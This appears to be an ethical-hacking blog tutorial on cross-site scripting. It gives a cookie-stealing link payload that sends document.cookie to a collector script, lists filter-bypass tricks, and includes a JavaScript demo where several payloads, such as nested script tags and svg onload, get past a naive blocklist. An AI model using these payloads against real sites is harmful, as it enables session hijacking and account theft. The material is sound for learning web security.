Hey Cyberpunks, I hope you are all doing great, and if not, then you are at the right place to at least get the doubts about XSS out of your life. This article is going to take you somewhere close to perfection (as we all know, nobody is perfect :P). So, without wasting any time, let's dive in.
Disclaimer:- I am going to keep it very simple so that you actually understand the #BehindtheScene of XSS. I will not cover the different types of XSS, as you can find that anywhere on the internet. This article talks about what happens on the backend and some techniques to get past XSS filters. No bookish language, just hackers' language.
Before we start, let's understand what XSS actually is.
What the hack is XSS (Cross-Site-Scripting)?
XSS is a client-side code injection attack. By that I mean the attacker gets their own script embedded in a page served by a genuine (trusted) website, so that when the victim's browser renders that page the script runs with the site's origin, i.e. with access to its cookies, its DOM and the victim's authenticated session.
I found the image below helpful for understanding the concept clearly. Have a look and try to follow what is actually happening.
Still have doubts? No worries at all, let's take a deeper dive with an example.
Example
1. Let's say you are testing a site xyz.com and you find that you can inject your own markup at some parameter (the vulnerable point).
2. Then you inject your payload, let's say:
<a onclick="document.location='http://localhost/ethicalkaps/getcookies.php?cookie='+escape(document.cookie);" href="https://ethicalkaps.com">ClickHere</a>
(This basically steals the cookie from the victim's session. escape() is deprecated in modern browsers; encodeURIComponent() does the same job and is what you should use today.)
3. The web application puts your input into the page without encoding it, so the browser parses your markup as part of the site's own HTML.
4. Now, when the victim clicks the link, the onclick handler fires first and sends document.cookie to your getcookies.php collector; only then does the browser follow the href. Keep in mind that document.cookie only exposes cookies set without the HttpOnly flag, so an HttpOnly session cookie will not show up in what you collect.
Simple, right? Yeah, indeed it is! But most of the time the developer filters or encodes the user input, so we are unable to inject our payload directly onto the website and have to look for ways around that filtering.
A few ways to bypass the restrictions :-
1. Use encoding for your payload (for example, < can be URL-encoded as %3C, ? as %3F, a newline as %0A, and so on). This works when the filter inspects the raw input but the application decodes it again before putting it into the page.
2. If your payload is reflected on the website but does not execute, view the page source and see where your payload is getting stuck (inside an attribute value, a script string, an HTML comment), then change the payload so it breaks out of that context.
3. Sometimes we miss XSS simply because nothing is reflected back to us (the input is shown to an admin or written to some log viewer), so don't forget to try Blind XSS. I personally use XSS Hunter for that.
4. You can run a Burp Intruder attack with a list of payloads if there is no rate limit on the parameter. I personally prefer :-
Reason being they keep updating their payload list on a regular basis.
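As an added example (not from the article), here is a constructed blocklist filter of the kind the points above are aimed at, run against a small payload list the way an Intruder attack would run a wordlist, plus the encoding case where the filter inspects the raw query string before the application URL-decodes it. The filter, the payloads and the "looks executable" check are all illustrative and written for this edit.

```javascript
// Added example (not from the article): why a blocklist "sanitizer" is
// bypassable, walked through with the bypass ideas from the list above.
// The filter, payload list and mini intruder loop are constructed.

// A typical homegrown filter: strip <script> tags and javascript: URLs, in one pass.
function naiveFilter(input) {
  return input
    .replace(/<\/?script[^>]*>/gi, '')
    .replace(/javascript:/gi, '');
}

// Some apps filter the raw query string and URL-decode afterwards (wrong order).
function filterThenDecode(rawQuery) {
  return decodeURIComponent(naiveFilter(rawQuery));
}

// Rough check of what reached the page: a script tag, or a tag carrying an
// on* event handler (whitespace or '/' before the attribute, as in <svg/onload=).
function looksExecutable(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*[\s\/]on[a-z]+\s*=/i.test(html);
}

// Candidate payloads, in the spirit of an Intruder run over a wordlist.
const PAYLOADS = [
  '<script>alert(1)</script>',                    // blocked: the one thing the filter knows
  '<scr<script>ipt>alert(1)</scr</script>ipt>',   // single-pass removal reassembles the tag
  '<svg/onload=alert(1)>',                        // no script tag at all
  '<img src=x onerror=alert(1)>',                 // event handler on an ordinary tag
  '"><svg/onload=alert(1)>',                      // breaks out of an attribute first
];

// Run every payload through the filter and keep the ones that still execute.
function survivors(filter, payloads) {
  return payloads.filter(p => looksExecutable(filter(p)));
}

// Encoding: %3C is harmless to the filter and becomes '<' when decoded later.
const ENCODED = '%3Csvg%2Fonload%3Dalert(1)%3E';

// Demo run
console.log(survivors(naiveFilter, PAYLOADS));               // 4 of the 5 payloads
console.log(naiveFilter(ENCODED) === ENCODED);               // true: filter saw nothing to strip
console.log(looksExecutable(filterThenDecode(ENCODED)));     // true: the page gets <svg/onload=...>
```

Reading the survivors list is exactly the "view page source and see where the payload is getting stuck" step automated: the only payload the filter stops is the one it was written for, and a single pass of string replacement is undone by nesting the forbidden token inside itself.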
These are some ways you can't forget to look out for. If you want to see more about how you can actually get around the filtering restrictions,
Visit :-
for some practical payload stuff.
So hackers, now it is time for you to decide: is it really just about finding the "PARAMETERS" or "SEARCH" field and running these kinds of payloads, for example "><script>alert("Cyberpunks here")</script> or "><svg/onload=alert(1)>, or is there something more to it?
Keep digging and learning new stuff. I will come back to you with another #BehindtheScene of some other vulnerability. Till then take care and keep hunting for good.
If you like the content, you can support me over here :- @buymeacoffee.com/ethicalkaps
See you in the next article. Until then, take care. Peace!